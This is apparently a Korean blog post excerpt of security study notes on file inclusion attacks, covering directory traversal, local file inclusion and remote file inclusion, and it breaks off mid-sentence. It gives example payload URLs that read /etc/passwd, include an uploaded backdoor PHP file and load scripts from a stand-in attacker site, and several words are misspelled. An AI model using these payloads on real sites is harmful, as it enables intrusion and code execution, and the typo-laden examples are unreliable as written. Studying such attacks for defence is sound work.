파일업로드공격1 [10주차] File Inclusion(LFI, RFI) File Iuclusion에서 공격 전 체크할 수 있는 사항으로는 Directory Traversal과 Local File lnclusion, Remote Dile Inclusion이다. Directory Traversal: ?page=../../etc/passwd Local File Inclusion: ?page=../../uploads/my_backdoor.php Remote File Inclusion: ?page=hrrp://evillsite.com/attackserver.php, ?page=http://evilsite.com/XSS.js **윈도우는 역슬래시 리눅스는 / 슬래시이다. RFI(원격 파일 포함, Remote File Inclusion)는 외부 스크립트를 동적으로 참조하는 웹 응용 프로.. 2021. 12. 16. 이전 1 다음